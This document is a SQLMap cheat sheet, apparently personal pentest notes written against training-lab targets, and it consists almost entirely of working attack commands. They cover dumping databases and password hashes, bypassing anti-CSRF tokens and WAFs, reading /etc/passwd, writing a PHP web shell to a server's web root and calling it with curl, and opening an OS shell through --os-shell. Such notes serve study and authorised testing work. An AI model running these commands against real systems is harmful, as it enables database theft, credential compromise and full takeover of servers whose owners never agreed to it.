🗺️SQLMap

Installation

  • sudo apt install sqlmap

Manual Installation

  • git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

Execution

  • python sqlmap.py

  • sqlmap -hh

  • B: Boolean-based blind

  • E: Error-based

  • U: Union query-based

  • S: Stacked queries

  • T: Time-based blind

  • Q: Inline queries

  • sqlmap -u "http://www.example.com/vuln.php?id=1" --batch

Flag:

  • -u: is used to provide the target URL

  • --batch: is used for skipping any required user-input

Testing POST

  • sqlmap 'http://www.example.com/' --data 'uid=1&name=test'

Special marker *

  • sqlmap 'http://www.example.com/' --data 'uid=1*&name=test'

Full HTTP Requests

Run SQLMap with an HTTP request file

  • sqlmap -r req.txt

Cookies

  • sqlmap -u "http://157.245.46.51:30545/case3.php" --cookie='id=1' -p 'id' --param-filter='COOKIE' --level=2 --dump --batch

Display Errors

  • --parse-errors

Prefix/Suffix

  • sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -"

Ref:

  • sqlmap -r req.txt --batch -T flag5 --no-cast --risk=3 --dump --technique=B

  • sqlmap -r req.txt --batch --dump --prefix='`)'

  • sqlmap -r req.txt --batch --dump --union-col=5 --no-cast

Basic DB Data Enumeration

  • Database version banner (switch --banner)

  • Current user name (switch --current-user)

  • Current database name (switch --current-db)

  • Checking if the current user has DBA (administrator) rights.

sqlmap -u "http://www.example.com/?id=1" --banner --current-user --current-db --is-dba

Table Enumeration

sqlmap -u "http://www.example.com/?id=1" --tables -D testdb
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb

Tip: Apart from default CSV, we can specify the output format with the option --dump-format to HTML or SQLite, so that we can later further investigate the DB in an SQLite environment.

Table/Row Enumeration

sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb -C name,surname
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --start=2 --stop=3

Conditional Enumeration

sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --where="name LIKE 'f%'"

Full DB Enumeration

  • --dump-all --exclude-sysdbs

DB Schema Enumeration

sqlmap -u "http://www.example.com/?id=1" --schema

Searching for Data

sqlmap -u "http://www.example.com/?id=1" --search -T user
sqlmap -u "http://www.example.com/?id=1" --search -C pass

Password Enumeration and Cracking

sqlmap -u "http://www.example.com/?id=1" --dump -D master -T users

DB Users Password Enumeration and Cracking

sqlmap -u "http://www.example.com/?id=1" --passwords --batch

Tip: The '--all' switch in combination with the '--batch' switch, will automa(g)ically do the whole enumeration process on the target itself, and provide the entire enumeration details.

Anti-CSRF Token Bypass

  • --csrf-token

sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token"

Unique Value Bypass

  • --randomize

sqlmap -u "http://www.example.com/?id=1&rp=29125" --randomize=rp --batch -v 5 | grep URI

Calculated Parameter Bypass

  • --eval

sqlmap -u "http://www.example.com/?id=1&h=c4ca4238a0b923820dcc509a6f75849b" --eval="import hashlib; h=hashlib.md5(id).hexdigest()" --batch -v 5 | grep URI

Ref:

  • sqlmap -u 'http://167.71.139.192:31141/case8.php' --data 'id=1&t0ken=wSQJPIxhc3AxIAaE8L2Jbas3OSlwkHjWdaolkgabU' --csrf-token="t0ken" -T flag8 --no-cast --dump

  • sqlmap -u 'http://167.71.139.192:31141/case9.php?id=1&uid=3022365281' --batch --randomize=uid -v 5 -T flag9 --dump --no-cast

  • sqlmap -u 'http://167.71.139.192:31141/case10.php' --data 'id=1' -p 'id' --random-agent --dump --batch --no-cast -T flag10

  • sqlmap -u 'http://167.71.139.192:31141/case11.php?id=1' -p 'id' --tamper=between --batch --dump --no-cast -T flag11

Checking for DBA Privileges

  • --is-dba

sqlmap -u "http://www.example.com/case1.php?id=1" --is-dba

WAF Bypass

  • --skip-waf

Reading Local Files

  • --file-read

sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd"

Writing Local Files

  • --file-write

  • --file-dest

echo '<?php system($_GET["cmd"]); ?>' > shell.php
sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"
curl http://www.example.com/shell.php?cmd=ls+-la

OS Command Execution

  • --os-shell

sqlmap -u "http://www.example.com/?id=1" --os-shell
sqlmap -u "http://www.example.com/?id=1" --os-shell --technique=E

Ref:

  • sqlmap -u 'http://167.71.139.140:32080/?id=1' --file-read '/var/www/html/flag.txt'

  • sqlmap -r req.txt -D <database> -T <table> --dump --batch --no-cast --tamper=between

  • --dump-all --batch --no-cast --exclude-sysdbs --random-agent --skip-waf --tamper=between

PreviousMySQLNextPython Regular Expression Quick Guide

Last updated